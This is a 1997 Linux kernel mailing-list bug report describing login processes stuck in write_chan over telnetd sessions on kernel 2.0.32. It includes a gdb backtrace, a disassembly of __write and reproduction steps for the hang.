TTY lockup's (Kernel V2.0.32)

Karl Vogel (kvo@seagha.com)
Mon, 1 Dec 1997 10:21:04 +0100 (MET)


I've been having a problem with login processes that get stuck. The problem
first appeared on my system when running Kernel V2.0.27. What happened was that
somebody logged in and for some reason entered more than 256 characters at the
login problem, causing the login process to lock up. (mostly caused by modems
connecting without error control, spewing out loads of random data)
When this happened I could just kill the process or use a 'cat </dev/ttypX' to
get the remaining data from the ttyp, causing the login process to continue
and quit.

Then I noticed kernel V2.0.31 included some reworked tty code by Bill Hawes.
So I installed the lastest kernel to make sure I was running up to date code.
(Kernel V2.0.32).

This fixed the problem partly. Now if I send more than 256 characters to a
login process on a telnetd session, it doesn't lock up anymore. However I still
notice a locked up login process every now and then.

Here's some information I collected:

KERNEL: Linux Kernel V2.0.32
RPMS: /bin/login from package util-linux-2.5-11fix
/usr/sbin/in.telnetd from package NetKit-B-0.06-12
libc from package libc-5.3.12-17
libtermcap from package libtermcap-2.0.8-4

14383 pb S < 0:00 login -h srv004.seagha.com -p
('ps l' indicates it's waiting in write_chan)

----------------------------------
(gdb) bt
#0 0x40020d78 in __write ()
#1 0x40030f5b in _IO_file_write ()
Cannot access memory at address 0x21.
(gdb)
----------------------------------

(gdb) disas
Dump of assembler code for function __write:
0x40020d64 <__write>: pushl %ebp
0x40020d65 <__write+1>: movl %esp,%ebp
0x40020d67 <__write+3>: pushl %ebx
0x40020d68 <__write+4>: movl $0x4,%eax
0x40020d6d <__write+9>: movl 0x8(%ebp),%ebx
0x40020d70 <__write+12>: movl 0xc(%ebp),%ecx
0x40020d73 <__write+15>: movl 0x10(%ebp),%edx
0x40020d76 <__write+18>: int $0x80
0x40020d78 <__write+20>: movl %eax,%edx
0x40020d7a <__write+22>: testl %edx,%edx
0x40020d7c <__write+24>: jnl 0x40020d9a <__write+54>
0x40020d7e <__write+26>: negl %edx
0x40020d80 <__write+28>: pushl %edx
0x40020d81 <__write+29>: call 0x40020d86 <__write+34>
0x40020d86 <__write+34>: popl %ebx
0x40020d87 <__write+35>: addl $0x7ec12,%ebx
0x40020d8d <__write+41>: call 0x4001e3e8 <_init+10344>
0x40020d92 <__write+46>: popl %edx
0x40020d93 <__write+47>: movl %edx,(%eax)
0x40020d95 <__write+49>: movl $0xffffffff,%eax
0x40020d9a <__write+54>: popl %ebx
0x40020d9b <__write+55>: movl %ebp,%esp
0x40020d9d <__write+57>: popl %ebp
0x40020d9e <__write+58>: ret
0x40020d9f <__write+59>: nop
End of assembler dump.
------------

On a kernel < V2.0.31 you can easily simulate this by telnetting into your box,
then entering more than 256 characters at the login prompt and the aborting the
connection using ^]. If you now do a PS you will see that the login process is
still waiting on the data. Use 'cat </dev/ttypXX' to grab the remaining data,
this will let the login process continue and die.
On a kernel >= V2.0.31 this doesn't work anymore, and I haven't been able to
reproduce the problem manually, which makes it more difficult to correct.

(Note.. all these connections run over a telnetd session.. even the modem
logins -- the linux box doesn't have modems directly connected to it)

Karl.

// Electronic Mail - SMTP: kvo@seagha.com
\X/ - X400: c=BE; a=RTT; p=SEAGHA; s=VOGEL; g=KARL